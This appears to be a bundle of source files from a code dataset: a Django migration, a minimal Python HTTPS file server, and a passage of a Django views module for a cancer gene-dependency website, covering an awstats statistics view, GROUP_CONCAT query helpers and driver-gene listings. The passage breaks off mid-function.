-*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Contact',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100)),\n ('email', models.EmailField(max_length=254)),\n ('message', models.TextField()),\n ('timestamp', models.DateTimeField(auto_now=True)),\n ],\n options={\n 'verbose_name_plural': 'Contact Messages',\n },\n ),\n migrations.CreateModel(\n name='Event',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('organizer', models.CharField(max_length=120)),\n ('slug', models.SlugField(unique=True)),\n ('venue', models.CharField(max_length=100)),\n ('description', models.TextField(max_length=500)),\n ('timestamp', models.DateField(auto_now=True)),\n ('start_date', models.DateField()),\n ('end_date', models.DateField()),\n ],\n ),\n migrations.CreateModel(\n name='MailInvites',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('subject', models.CharField(max_length=50)),\n ('recipients', models.EmailField(max_length=100)),\n ('message', models.TextField(max_length=500)),\n ],\n options={\n 'verbose_name_plural': 'Mail invites',\n },\n ),\n migrations.CreateModel(\n name='UserProfile',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","repo_name":"Hamfri/organizer","sub_path":"organize/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30273500930","text":"#!/usr/bin/env python\n\nimport os, sys, io\nimport http.server, socketserver\nimport ssl\n\nclass Handler(http.server.SimpleHTTPRequestHandler):\n def do_GET(self):\n http.server.SimpleHTTPRequestHandler.do_GET(self);\n\n def do_POST(self):\n print('TODO do_POST with self={}'.format(self))\n\n\ndef main():\n if not os.path.exists('scratch'):\n os.makedirs('scratch')\n\n ssl_key_path = os.path.abspath( os.path.join('ssl', 'key.pem') )\n ssl_cert_path = os.path.abspath( os.path.join('ssl', 'cert.pem') )\n\n\n os.chdir('www')\n httpd = socketserver.TCPServer(('', 4443), Handler)\n httpd.socket = ssl.wrap_socket(httpd.socket,\n keyfile=ssl_key_path,\n certfile=ssl_cert_path,\n server_side=True\n )\n print('Listening on https://[::]:4443')\n try:\n httpd.serve_forever()\n except KeyboardInterrupt:\n pass\n httpd.server_close()\n\n\n\nif __name__ == '__main__':\n os.chdir( os.path.dirname(os.path.abspath(__file__)) )\n main()\n","repo_name":"Jeffrey-P-McAteer/e-yoga-01","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5079582316","text":"import csv, time\nimport json # For ajax for the jquery autocomplete search box\nimport math # For ceil()\nfrom urllib.request import Request, urlopen\nfrom urllib.error import URLError\nfrom datetime import datetime # For get_timming() and log_comment()\nimport requests # for Enrichr and mailgun email server\nimport ipaddress # For is_valid_ip()\nimport subprocess, io, os # Used for awstats_view()\n\nfrom django.http import HttpResponse #, JsonResponse\nfrom django.shortcuts import get_object_or_404, render\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.cache import cache # To cache previous results. NOTE: \"To provide thread-safety, a different instance of the cache backend will be returned for each thread.\"\nfrom django.core.urlresolvers import reverse\nfrom django.utils import timezone # For log_comment(), with USE_TZ=True in settings.py, and istall \"pytz\"\nfrom django.db.models import Q # Used for get_drivers()\n\nfrom .models import Study, Gene, Dependency, Comment #, News, Download # Removed: Histotype,\n\nfrom django.conf import settings # import the settings file for the Google analytics ID. Maybe better to use a context processor in the settings.py file: https://chriskief.com/2013/09/19/access-django-constants-from-settings-py-in-a-template/ and: http://www.nomadblue.com/blog/django/google-analytics-tracking-code-into-django-project/\n# or use the settings export script: https://github.com/jkbrzt/django-settings-export (see: http://stackoverflow.com/questions/433162/can-i-access-constants-in-settings-py-from-templates-in-django and: http://stackoverflow.com/questions/629696/deploying-google-analytics-with-django and: https://github.com/montylounge/django-google-analytics )\n\n# Optionally use Django logging during development and testing:\n# This Django logging is configured in settings.py and is based on: http://ianalexandr.com/blog/getting-started-with-django-logging-in-5-minutes.html\n#import logging\n#logger = logging.getLogger(__name__)\n#def log(): logger.debug(\"this is a debug message!\")\n#def log_error(): logger.error(\"this is an error message!!\")\n\n# Mime types for the responses:\nhtml_mimetype = 'text/html; charset=utf-8'\njson_mimetype = 'application/json; charset=utf-8'\ncsv_mimetype = 'text/csv; charset=utf-8' # can be called: 'application/x-csv' or 'application/csv'\ntab_mimetype = 'text/tab-separated-values; charset=utf-8'\nplain_mimetype ='text/plain; charset=utf-8'\n#excel_minetype ='application/vnd.ms-excel'\nexcel_minetype ='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet' # for xlsx format?\n\n# Alternatively can use separate parameter in HtmlResponse: charset='UTF-8' instead of including 'charset=utf-8' in the content_type\n\n# Enricher URL:\nENRICHR_BASE_URL = 'http://amp.pharm.mssm.edu/Enrichr/'\n\ndef post_or_get_from_request(request, name):\n if request.method == 'POST': return request.POST.get(name, '')\n elif request.method == 'GET': return request.GET.get(name, '')\n else: return ''\n \ndef JsonResponse(data, safe=False):\n \"\"\" Could use the Django JsonResponse but less format options, so using HtmlResponse() \"\"\"\n # eg: django.http.JsonResponse(data, safe=safe)\n return HttpResponse(json.dumps(data, separators=[',',':']), content_type=json_mimetype)\n\ndef PlainResponse(msg):\n return HttpResponse(msg, content_type=plain_mimetype)\n\ndef json_error(message, status_code='1'):\n \"\"\" Sends an error message to the browser in JSON format \"\"\"\n return JsonResponse( {'success': False, 'error': status_code, 'message': message } ) # eg: str(exception)\n\ndef html_error(msg):\n return HttpResponse(\"

Error:

\"+msg)\n\ndef plain_error(msg):\n return PlainResponse(msg)\n\n\ndef is_search_by_driver(search_by):\n \"\"\" Checks if the 'search_by' parameter is valid, returning True if the dependency search is by driver \"\"\"\n if search_by == 'driver': return True\n elif search_by == 'target': return False\n else: print(\"ERROR: **** Invalid search_by: '%s' ****\" %(search_by))\n\ndef get_study_shortname_from_study_list(study_pmid, study_list):\n if (study_pmid is None) or (study_pmid == ''):\n return ''\n if study_pmid==\"ALL_STUDIES\":\n return \"All studies\"\n try:\n study = study_list.get(study_pmid=study.pmid)\n# Or iterate through the list:\n# for study in study_list:\n# if study_pmid == study.pmid:\n return study.short_name\n except ObjectDoesNotExist: # Not found by the objects.get()\n print(\"WARNING: '\"+study_pmid+\"' NOT found in database so will be ignored\")\n return '' # ie. if study_pmid parameter value not found then ignore it.\n\n\n\ndef get_timing(start_time, name, time_list=None):\n \"\"\" Prints the time taken by functions, to help optimise the code and SQL queries.\n The start_time parameter value should be obtained from: datetime.now()\n Optionally if 'time_list' is passed then an array of timings is added to this list that can then be sent to Webbrowser console via JSON. A python list (array) is used (rather than a dictionary) so will preserve the order of elements. \"\"\"\n duration = datetime.now() - start_time # This duration is in milliseconds\n # To print results in server log, use:\n # print( \"%s: %s msec\" %(name,str(duration))) # or use: duration.total_seconds()\n if time_list is not None:\n if not isinstance(time_list, list):\n print(\"ERROR: get_timings() 'time_list' parameter is not a list\")\n #if name in time_dict: print(\"WARNING: Key '%s' is already in the time_dict\" %(name))\n time_list.append({name: str(duration)})\n return datetime.now()\n\n\ndef awstats_view(request):\n awstats_dir = \"/home/cgenetics/awstats\"\n awstats_script = os.path.join(awstats_dir, \"wwwroot/cgi-bin/awstats.pl\")\n # awstats_script = os.path.join(awstats_dir, \"run_awstats.sh\") # Test script for debugging.\n \n # Local test settings:\n #awstats_dir = \"/Users/sbridgett/Documents/UCD/cgdd\"\n #awstats_script = os.path.join(awstats_dir, \"run_awstats.sh\")\n\n# Also added: PLUGIN: DecodeUTFKeys\n# REQUIRED MODULES: Encode and URI::Escape\n# PARAMETERS: None\n# DESCRIPTION: Allow AWStats to show correctly (in language charset)\n# keywords/keyphrases strings even if they were UTF8 coded by the\n# referer search engine.\n#\n# SJB enabled this plugin to cope with some server names in UTF8\n# LoadPlugin=\"decodeutfkeys\"\n perl5lib_for_decodeutfkeys = awstats_dir+\"/URI-1.71/lib:\"+awstats_dir+\"/Encode-2.88/install_dir/lib/perl/5.18.2\"\n \n perl5lib_for_geoip = awstats_dir+\"/Geo-IP-1.50/install_dir/lib/perl/5.18.2\" # Path to the Geo-IP module used by awstats.pl. Could add: +os.pathsep+os.environ['PERL5LIB']\n config = \"awstats.cancergd.org.conf\" # awstats config file (in awstats_dir/wwwroot/cgi-bin) for gathering and displaying the cancergd stats.\n\n cmd = [ awstats_script, '-config='+config ]\n env = dict(os.environ, PERL5LIB=perl5lib_for_geoip+':'+perl5lib_for_decodeutfkeys)\n # Alternatively copy the existing env and then modify it, so can add to any existing PERL5LIB:\n # env = os.environ.copy()\n # env['PERL5LIB'] = perl5lib_for_geoip + os.pathsep + env['PERL5LIB'] # note: os.pathsep is : or ; whereas os.path.sep is \\\\ or /\n \n \n if len(request.GET.dict())==0: # as just called with /stats so set default:\n cmd.append('-output')\n else:\n for key,val in request.GET.items():\n if key=='config': continue # Always set to this config option above (just in case accidentally or deliberately user tries a different config)\n cmd.append('-'+key+'='+val) # eg: output, hostfilter, hostfilterex\n\n \n print(\"cmd\",cmd)\n \n p = subprocess.Popen( cmd, env=env, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n # Optionally add: stderr=subprocess.PIPE, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True\n # For 'shell=True' submit the whole command as one string, but this starts a new shell process (which is an expensive operation).\n # If submit the command with 'shell=False', give the command as a list of strings, with the command name in the first element of the list, the first argument in the next list element, etc.\n # But need 'shell=True' for eg: ls and rmdir which are not programs, but are internal commands within the shell program.\n # 'universal_newlines=True' means will return Strings (rather than Bytes)\n # Maybe 'bufsize=-1'\n\n # \"This will deadlock when using stdout=PIPE or stderr=PIPE and the child process generates enough output to a pipe such that it blocks waiting for the OS pipe buffer to accept more data. Use Popen.communicate() when using pipes to avoid that.\n # \"Use the communicate() method rather than .stdin.write, .stdout.read or .stderr.read to avoid deadlocks due to streams pausing reading or writing and blocking the child process.\n\n # awstats output seems to be in \"iso-8859-1\" rather than \"uft-8\" see: https://sourceforge.net/p/awstats/discussion/43428/thread/b5cbb36c/\n # So can get error about: \n # File \"/home/cgenetics/cancergd/gendep/views.py\", line 146, in awstats_view\n # stdout, stderr = p.communicate(timeout=None)\n # File \"/usr/lib/python3.4/subprocess.py\", line 960, in communicate\n # stdout, stderr = self._communicate(input, endtime, timeout)\n # File \"/usr/lib/python3.4/subprocess.py\", line 1659, in _communicate\n # self.stdout.encoding)\n # File \"/usr/lib/python3.4/subprocess.py\", line 888, in _translate_newlines\n # data = data.decode(encoding)\n # UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe7 in position 93349: invalid continuation byte\n\n stdout, stderr = p.communicate(timeout=None)\n # except TimeoutExpired:\n # os.killpg(process.pid, signal)\n if p.returncode != 0:\n return html_error( \"awstats failed with error code: %d StdErr: %s\" %(p.returncode, '' if stderr is None else stderr) )\n\n # For the 'AllowUpdatesFromBrowser=1' awstats config option, the update button link: http://www.cancergd.org/gendep/awstats/awstats?config=awstats.cancergd.org.conf&update=1\n # If there are any updates then will the stdout will start with:\n # Create/Update database for config \"/home/cgenetics/awstats/awstats.cancergd.org.conf\" by AWStats version 7.5 (build 20160301)\n # From data in log file \"/home/cgenetics/awstats/tools/logresolvemerge.pl /var/log/*access.log* |\"...\n # As if the \"Update Now\" is clicked with a subsection then the updated datta is returned.\n if \"-update=1\" in cmd and stdout[:len(\"Create/Update database\")]==\"Create/Update database\":\n stdout = stdout.replace(\"\\n\",\"
\\n\")\n stdout += '
'\n\n # Could add logout link: http://127.0.0.1:8000/admin/logout/ which is reverse( 'logout' ) or reverse( 'admin:logout' )\n logout_link = '

Admin LOG OUT

'\n return HttpResponse( (\"\" if stderr==\"\" else \"ERROR:
\"+stderr+\"
\\n\\n\") + logout_link +stdout ) \n # Could add to the update now link in the awstats.pl srcript: padding: 10px 20px; \n\n awstats_dir = \"/home/cgenetics/awstats\"\n awstats_script = \"${awstats_dir}/wwwroot/cgi-bin/awstats.pl\"\n \n # awstats_script = os.path.join(awstats_dir, \"run_awstats.sh\") # Test script for debugging.\n \n # Local test settings:\n #awstats_dir = \"/Users/sbridgett/Documents/UCD/cgdd\"\n #awstats_script = os.path.join(awstats_dir, \"run_awstats.sh\")\n\n perl5lib_for_geoip = awstats_dir+\"/Geo-IP-1.50/install_dir/lib/perl/5.18.2\" # Path to the Geo-IP module used by awstats.pl. Could add: +os.pathsep+os.environ['PERL5LIB']\n config = \"awstats.cancergd.org.conf\" # awstats config file (in awstats_dir/wwwroot/cgi-bin) for gathering and displaying the cancergd stats.\n\n cmd = [ awstats_script, '-config='+config ]\n env = dict(os.environ, PERL5LIB=perl5lib_for_geoip)\n # Alternatively copy the existing env and then modify it, so can add to any existing PERL5LIB:\n # env = os.environ.copy()\n # env['PERL5LIB'] = perl5lib_for_geoip + os.pathsep + env['PERL5LIB'] # note: os.pathsep is : or ; whereas os.path.sep is \\\\ or /\n \n \n if len(request.GET.dict())==0: # as just called with /stats so set default:\n cmd.append('-output')\n else:\n for key,val in request.GET.items():\n if key=='config': continue # Always set to this config option above (just in case accidentally or deliberately user tries a different config)\n cmd.append('-'+key+'='+val) # eg: output, hostfilter, hostfilterex\n\n \n print(\"cmd\",cmd)\n \n p = subprocess.Popen( cmd, env=env, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n # Optionally add: stderr=subprocess.PIPE, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True\n # For 'shell=True' submit the whole command as one string, but this starts a new shell process (which is an expensive operation).\n # If submit the command with 'shell=False', give the command as a list of strings, with the command name in the first element of the list, the first argument in the next list element, etc.\n # But need 'shell=True' for eg: ls and rmdir which are not programs, but are internal commands within the shell program.\n # 'universal_newlines=True' means will return Strings (rather than Bytes)\n # Maybe 'bufsize=-1'\n\n # \"This will deadlock when using stdout=PIPE or stderr=PIPE and the child process generates enough output to a pipe such that it blocks waiting for the OS pipe buffer to accept more data. Use Popen.communicate() when using pipes to avoid that.\n # \"Use the communicate() method rather than .stdin.write, .stdout.read or .stderr.read to avoid deadlocks due to streams pausing reading or writing and blocking the child process. \n\n # awstats output seems to be in \"iso-8859-1\" rather than \"uft-8\" see: https://sourceforge.net/p/awstats/discussion/43428/thread/b5cbb36c/\n # So can get error about: \n # File \"/home/cgenetics/cancergd/gendep/views.py\", line 146, in awstats_view\n # stdout, stderr = p.communicate(timeout=None)\n # File \"/usr/lib/python3.4/subprocess.py\", line 960, in communicate\n # stdout, stderr = self._communicate(input, endtime, timeout)\n # File \"/usr/lib/python3.4/subprocess.py\", line 1659, in _communicate\n # self.stdout.encoding)\n # File \"/usr/lib/python3.4/subprocess.py\", line 888, in _translate_newlines\n # data = data.decode(encoding)\n # UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe7 in position 93349: invalid continuation byte\n\n stdout, stderr = p.communicate(timeout=None)\n # except TimeoutExpired:\n # os.killpg(process.pid, signal)\n if p.returncode != 0:\n return html_error( \"awstats failed with error code: %d StdErr: %s\" %(p.returncode, '' if stderr is None else stderr) )\n\n # For the 'AllowUpdatesFromBrowser=1' awstats config option, the update button link: http://www.cancergd.org/gendep/awstats/awstats?config=awstats.cancergd.org.conf&update=1\n # If there are any updates then will the stdout will start with:\n # Create/Update database for config \"/home/cgenetics/awstats/awstats.cancergd.org.conf\" by AWStats version 7.5 (build 20160301)\n # From data in log file \"/home/cgenetics/awstats/tools/logresolvemerge.pl /var/log/*access.log* |\"...\n # As if the \"Update Now\" is clicked with a subsection then the updated datta is returned.\n if \"-update=1\" in cmd and stdout[:len(\"Create/Update database\")]==\"Create/Update database\":\n stdout = stdout.replace(\"\\n\",\"
\\n\")\n stdout += '
'\n\n # Could add logout link: http://127.0.0.1:8000/admin/logout/ which is reverse( 'logout' ) or reverse( 'admin:logout' )\n logout_link = '

Admin LOG OUT

'\n return HttpResponse( (\"\" if stderr==\"\" else \"ERROR:
\"+stderr+\"
\\n\\n\") + logout_link +stdout ) \n # Could add to the update now link in the awstats.pl srcript: padding: 10px 20px; \n\n#=======\n\n\n\n\n\n# From: http://stackoverflow.com/questions/10340684/group-concat-equivalent-in-django\n# Django doesn't have built-in support for GROUP_CONCAT (which is available in SQLite and MySQL), so create an Aggregate class for it:\n\nfrom django.db.models import Aggregate, CharField, F\n\nclass Concat(Aggregate):\n # supports COUNT(distinct field)\n function = 'GROUP_CONCAT'\n \n engine = settings.DATABASES['default']['ENGINE']\n if engine == 'django.db.backends.sqlite3':\n template = '%(function)s(%(distinct)s%(expressions)s)' # Added separator doesn't doesn't work in sqlite when DISTINCT. No order by within the GROUP_CONCAT in Sqlite\n elif engine == 'django.db.backends.mysql':\n template = '%(function)s(%(distinct)s%(expressions) ORDER BY s%(expressions) SEPARATOR \",\")' # but doesn't work in sqlite.\n elif engine == 'django.db.backends.postgresql': # https://coderwall.com/p/eyknwa/postgres-group_concat\n template = 'string_agg(%(distinct)s%(expressions), \",\" ORDER BY %(expressions)s)' # add order by after separator and without a comma before it: https://www.postgresql.org/docs/9.5/static/sql-expressions.html#SYNTAX-AGGREGATES\n else:\n html_error(\"Unexpected database engine: %s\" %(engine))\n \n # template = '%(function)s(%(distinct)s%(expressions)s,\";\")' # but doesn't work in sqlite. \n # template = '%(function)s(%(distinct)s%(expressions)s,\"%(sep)s\")'\n # sep=sep\n # BUT get error: OperationalError: DISTINCT aggregates must have exactly one argument\n # it seems from web that cannot have both DISTINCT and a custom separator\n \n # In MySQL can add: ORDER BY DESC SEPARATOR ' '\n \n def __init__(self, expression, distinct=False, **extra): # sep=';', BUT doesn't work in sqlite\n super(Concat, self).__init__(\n expression,\n distinct='DISTINCT ' if distinct else '',\n output_field=CharField(),\n **extra)\n# use it simply as:\n\n# query_set = Fruits.objects.values('type').annotate(count=Count('type'),\n# name = Concat('name')).order_by('-count')\n\n\n# OR:\n# In the upcoming Django 1.8 you could just implement GroupConcat expression, and then the query would look like:\n# Event.objects.values('slug').annotate(emails=GroupConcat('task__person__email'))\n# The .values().annotate() combination sets the GROUP BY to slug, and of course the GroupConcat implementation does the actual aggregation.\n# For how to write the GroupConcat implementation check out https://docs.djangoproject.com/en/dev/ref/models/expressions/#writing-your-own-query-expressions\n\ndef group_concat(column):\n engine = settings.DATABASES['default']['ENGINE']\n if engine == 'django.db.backends.sqlite3':\n return \"GROUP_CONCAT(DISTINCT %s)\" %(column) # Added separator doesn't doesn't work in sqlite when DISTINCT. No ORDER BY within the GROUP_CONCAT in Sqlite\n elif engine == 'django.db.backends.mysql':\n return \"GROUP_CONCAT(DISTINCT %s ORDER BY %s)\" %(column,column) # In MySQl can add: SEPARATOR \",\" \n elif engine == 'django.db.backends.postgresql': # https://coderwall.com/p/eyknwa/postgres-group_concat\n return \"string_agg(DISTINCT %s, ',' ORDER BY %s)\" %(column,column) # add order by after separator and without a comma before it: https://www.postgresql.org/docs/9.5/static/sql-expressions.html#SYNTAX-AGGREGATES\n else:\n html_error(\"Unexpected database engine: %s\" %(engine))\n return \"ERROR\"\n\n\ndef build_driver_list(webpage):\n # An alternative to creating these concatenated histotype and study lists is:\n # for one driver:\n # select distinct pmid from gendep_dependency where driver='ERBB2' order by pmid;\n # select distinct histotype from gendep_dependency where driver='ERBB2' order by histotype;\n\n # or for all drivers:\n # select distinct driver, histotype from gendep_dependency order by driver,histotype;\n # select distinct driver, pmid from gendep_dependency order by driver,pmid;\n\n # For the full three-way data, so could set menus based on the other choices:\n # select distinct driver, histotype, pmid from gendep_dependency order by driver, histotype, pmid;\n\n\n # If the values() clause precedes the annotate(), the annotation will be computed using the grouping described by the values() clause:\n # query_seq = Dependency.objects.values('driver_id','driver__full_name','driver__prevname_synonyms').annotate(histotypes=Concat('histotype',distinct=True),studies=Concat('study_id',distinct=True)).order_by('driver_id')\n \n # SELECT \"gendep_dependency\".\"driver\", \"gendep_gene\".\"full_name\", \"gendep_gene\".\"prevname_synonyms\", GROUP_CONCAT(DISTINCT \"gendep_dependency\".\"histotype\") AS \"histotypes\", GROUP_CONCAT(DISTINCT \"gendep_dependency\".\"pmid\") AS \"studies\" FROM \"gendep_dependency\" INNER JOIN \"gendep_gene\" ON (\"gendep_dependency\".\"driver\" = \"gendep_gene\".\"gene_name\") GROUP BY \"gendep_dependency\".\"driver\", \"gendep_gene\".\"full_name\", \"gendep_gene\".\"prevname_synonyms\" ORDER BY \"gendep_dependency\".\"driver\" ASC driver histotypes study\n\n\n # (3) Use RAW SQL:\n if settings.DATABASES['default']['ENGINE'] == 'django.db.backends.mysql':\n histotype_order = ' ORDER BY D.histotype'\n pmid_order = ' ORDER BY D.pmid'\n else:\n histotype_order = ''\n pmid_order = ''\n \n if webpage == 'searchpage':\n # Three possible queries:\n # (1) With precomputed lists in model.py: \n # driver_list = Gene.objects.filter(is_driver=True).only(\"gene_name\", \"full_name\", \"prevname_synonyms\", \"driver_histotype_list\", \"driver_study_list\").order_by('gene_name')\n\n # (2) Using Django ORM\n #driver_list = Dependency.objects.values('driver_id').annotate(full_name=F('driver__full_name'),prevname_synonyms=F('driver__prevname_synonyms'), entrez_id=F('driver__entrez_id'), driver_histotype_list=Concat('histotype',distinct=True), driver_study_list=Concat('study_id',distinct=True) ).order_by('driver_id')\n # But this includes the full_name and synonyms in the GROUP BY list.\n # Could try querying using the Gene object - but this isn't working yet:\n # driver_list = Gene.objects.values('gene_name').annotate(full_name=F('full_name'),prevname_synonyms=F('prevname_synonyms'), entrez_id=F('entrez_id'), driver_histotype_list=Concat('histotype',distinct=True), driver_study_list=Concat('study_id',distinct=True) ).order_by('driver_id')\n \n driver_list = Gene.objects.raw(\"SELECT G.gene_name, G.entrez_id, G.full_name, G.prevname_synonyms, \"\n + group_concat('D.histotype') + \" AS driver_histotype_list, \" # + \"GROUP_CONCAT(DISTINCT D.histotype\"+histotype_order+\") AS driver_histotype_list, \"\n + group_concat('D.pmid') + \" AS driver_study_list \" # \"GROUP_CONCAT(DISTINCT D.pmid\"+pmid_order+\") AS driver_study_list \"\n# + \"FROM gendep_dependency D INNER JOIN gendep_gene G ON (D.driver_entrez = G.entrez_id) \" # Now using Entrez_id as primary key for Gene\n# + \"FROM gendep_dependency D INNER JOIN gendep_gene G ON (D.driver = G.gene_name) \"\n# + \"FROM gendep_dependency D INNER JOIN gendep_gene G ON (D.driver_name = G.gene_name) \" # Now using Entrez_id as primary key for Gene\n + \"FROM gendep_dependency D INNER JOIN gendep_gene G ON (D.driver = G.entrez_id) \" # Now using Entrez_id as primary key for Gene\n# + \"GROUP BY D.driver_entrez ORDER BY G.entrez_id ASC\" # <-- Maybe should use this if always 1-to-1 mapping of entrez_id to driver_name\n + \"GROUP BY D.driver ORDER BY G.gene_name ASC\" \n )\n \n elif webpage == 'driverspage':\n # (1) With precomputed lists in model.py:\n # driver_list = Gene.objects.filter(is_driver=True).order_by('gene_name') # Needs: (is_driver=True), not just: (is_driver)\n\n driver_list = Gene.objects.raw(\"SELECT G.gene_name, G.entrez_id, G.full_name, G.prevname_synonyms, G.ensembl_id, G.hgnc_id, \"\n + \"COUNT(DISTINCT D.pmid) AS driver_num_studies, \"\n + \"COUNT(DISTINCT D.histotype) AS driver_num_histotypes, \"\n + \"COUNT(DISTINCT D.target) AS driver_num_targets, \"\n + group_concat('D.histotype') + \" AS driver_histotype_list, \"\n + group_concat('D.pmid') + \" AS driver_study_list \"\n# + \"FROM gendep_dependency D INNER JOIN gendep_gene G ON (D.driver = G.gene_name) \" \n# + \"FROM gendep_dependency D INNER JOIN gendep_gene G ON (D.driver_entrez = G.entrez_id) \" # Now using Entrez_id as primary key for Gene\n + \"FROM gendep_dependency D INNER JOIN gendep_gene G ON (D.driver = G.entrez_id) \" # Now using Entrez_id as primary key for Gene \n# + \"GROUP BY D.driver_entrez ORDER BY G.entrez_id ASC\"\n + \"GROUP BY D.driver ORDER BY G.gene_name ASC\" \n )\n \n else: html_error(\"build_driver_list() Unexpected page: '%s'\" %(webpage))\n \n print(driver_list.query)\n \n return driver_list\n\n\ndef build_driver_histotype_study_list(webpage):\n if webpage == 'searchpage':\n driver_histotype_study_list = Gene.objects.raw(\"SELECT G.gene_name, D.driver AS entrez_id, D.histotype, \"\n + group_concat('D.pmid') + \" AS study_list \"\n + \"FROM gendep_dependency D INNER JOIN gendep_gene G ON (D.driver = G.entrez_id) \" # Now using Entrez_id as primary key for Gene\n + \"GROUP BY D.driver, D.histotype ORDER BY G.gene_name, D.histotype ASC\"\n )\n #elif webpage == 'driverspage': \n else: html_error(\"build_driver_histotype_study_list() Unexpected page: '%s'\" %(webpage))\n\n print(driver_histotype_study_list.query)\n #for d in driver_histotype_study_list:\n # print(d.gene_name,d.entrez_id,d.histotype,d.study_list)\n return driver_histotype_study_list\n\n\n\n\ndef sort_list(list):\n return ','.join( sorted(list.split(',')) )\n \n\ndef index(request, search_by = 'driver', gene_name='', histotype_name='', study_pmid=''): # Add entrez_id as parameter in future ?\n \"\"\" Sets the javascript arrays for driver, histotypes and studies within the main home/index page.\n As the index page can be called with specified values, eg: '.../driver/ERBB2/PANCAN/26947069/'\n Then calls the 'index.html' template to create the webpage.\n The 'search_by' is usually by driver, but for the \"SearchByTarget\" webpage, it will be set to 'target' \"\"\"\n \n # Obtain the list of driver genes for the autocomplete box.\n # (Or for the 'Search-ByTarget' webpage, get the list of target genes).\n \n if is_search_by_driver(search_by):\n driver_list = build_driver_list('searchpage')\n driver_count = -1 # driver_list.count() doesn't work, as RAW query set has no .count() attribute, and driver count is only needed for the search by target.\n driver_histotype_study_list = build_driver_histotype_study_list('searchpage')\n target_list = []\n else: \n # This needs: (is_target=True), not just: (is_target)\n target_list = Gene.objects.filter(is_target=True).only(\"gene_name\", \"entrez_id\", \"full_name\", \"prevname_synonyms\").order_by('gene_name')\n driver_list = []\n driver_count = Gene.objects.filter(is_driver=True).count()\n driver_histotype_study_list = []\n\n # From testing the three different methods give the sample results\n #print(driver_list.query)\n #print(\"driver\\tfullname\\tsynonyms\\thistotypes\\tstudies\")\n #with open(\"junk123.orm\",\"w\") as f:\n # print(\"Writing .......\")\n # for d in driver_list:\n #print(d.gene_name,\"\\t\",d.full_name,\"\\t\",d.prevname_synonyms,\"\\t\", sort_list(d.driver_histotype_list),\"\\t\", sort_list(d.driver_study_list)) # print(row.driver_id, row.histotypes)  row['driver_id'],row['histotypes'],row[\"studies\"] \n #f.write(\"%s\\t%s\\t%s\\t%s\\t%s\\n\" %(d.gene_name, d.full_name, d.prevname_synonyms, sort_list(d.driver_histotype_list), sort_list(d.driver_study_list)) ) # print(row.driver_id, row.histotypes)  row['driver_id'],row['histotypes'],row[\"studies\"]\n #f.write(\"%s\\t%s\\t%s\\t%s\\t%s\\n\" %(d['driver_id'], d['full_name'], d['prevname_synonyms'], sort_list(d['driver_histotype_list']), sort_list(d['driver_study_list'])) ) # print(row.driver_id, row.histotypes)  row['driver_id'],row['histotypes'],row[\"studies\"]\n\n\n # Retrieve the tissue, experiment type, and study data:\n histotype_list = Dependency.HISTOTYPE_CHOICES\n # Alternatively if using histotype table (in the 'models.py' instead of 'choices' list): histotype_list = Histotype.objects.order_by('full_name')\n experimenttype_list = Study.EXPERIMENTTYPE_CHOICES\n study_list = Study.objects.order_by('pmid')\n \n # As this page could in future be called from the 'drivers' or 'targets' page, with the gene_name as a standard GET or POST parameter (instead of the Django '/gene_name' parameter option in url.py):\n # if (gene_name is None) or (gene_name == ''):\n # gene_name = post_or_get_from_request(request, 'gene_name')\n \n # Set the default histotype to display in the Tissues menu:\n # Previously this defaulted to PANCAN (or \"ALL_HISTOTYPES\"), BUT now the tissue menu is populated by javascript after the user selects driver gene:\n # if histotype_name==\"\": histotype_name=\"PANCAN\"\n if histotype_name is None: histotype_name='' \n \n # Get the study short name (to display as default in the studies menu) for the study_pmid:\n study_short_name = get_study_shortname_from_study_list(study_pmid,study_list)\n\n # Get host IP (or hostname) To display the host in title for developing on localhost or pythonanywhere server:\n # current_url = request.get_full_path()\n # current_url = request.build_absolute_uri()\n # current_url = request.META['SERVER_NAME']\n current_url = request.META['HTTP_HOST']\n\n # Set the context dictionary to pass to the template. (Alternatively could add locals() to the context to pass all local variables, eg: return render(request, 'app/page.html', locals())\n context = {'search_by': search_by, 'gene_name': gene_name, 'histotype_name': histotype_name, 'study_pmid': study_pmid, 'study_short_name': study_short_name, 'driver_count': driver_count, 'driver_list': driver_list, 'driver_histotype_study_list': driver_histotype_study_list, 'target_list': target_list, 'histotype_list': histotype_list, 'study_list': study_list, 'experimenttype_list': experimenttype_list, 'current_url': current_url , 'settings_GOOGLE_ANALYTICS_KEY': settings.GOOGLE_ANALYTICS_KEY}\n return render(request, 'gendep/index.html', context)\n\n\ndef get_drivers(request):\n \"\"\" Returns list of driver genes in JSON format for the jquery-ui autocomplete searchbox AJAX mode \"\"\"\n \n # if request.is_ajax(): # Users can also access this from API scripts so not always AJAX\n name_contains = request.GET.get('name', '')\n # jQuery autocomplete sends the query as \"name\" and it expects back three fields: id, label, and value, eg:\n # [ {\"id\": \"ERBB2\", \"value\":\"ERBB2\",\"label\":\"ERBB2, ....\"},\n # {\"id\": \"ERBB3\", 